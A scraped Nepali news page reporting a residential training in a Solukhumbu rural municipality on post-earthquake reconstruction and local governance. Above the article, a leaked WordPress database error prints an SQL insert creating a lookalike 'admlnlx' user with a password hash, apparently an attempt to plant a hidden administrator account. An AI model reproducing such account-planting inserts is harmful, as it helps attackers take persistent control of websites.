WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BV1njehd2eWxehLegRirCGe78HIglv.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 06:04:04', '', 'admlnlx', 'admlnlx')
गाँउले न्यूज–११ फाल्गुण, काठमाडौं : सोलुखुम्बुस्थित माम्य दुधकोशी गाउँपालिकामा आवासीय तालिम सन्चालन गरिएको छ । भूकम्प पछिको पुननिर्माण र स्थानीय सरकार संचालन विधि सम्बन्धि आवासीय तालिम आजबाट सञ्चालन गरिएको हो । राष्ट्र निर्माण मञ्चद्धारा आयोजित सो कार्यक्रम भोली समापन हुने जनाइएको छ । सो कार्यक्रममा जनप्रतिनिधि तथा कर्मचारीलगायत तिन दर्जनको उपस्थिति रहेको थियो ।
आजको तालिममा स्थानीय कानुन तर्जुमा,कर निर्धारण तथा स्थानीय संवैधानिक कार्यवाहीसम्बन्धि छलफल गरिएको थियो । सो तालिमले जनताको भुकम्पिय समस्याबारे व्यवस्थापन तथा स्थानीय कानुन निर्माणमा जनप्रतिनिधिलाई सहज हुने माप्य दुधकोशी गाउँपालिकाका उपाध्यक्ष जुनिता मगरले जानकारी गराइन ।



श्रोत : सन्देशबाहक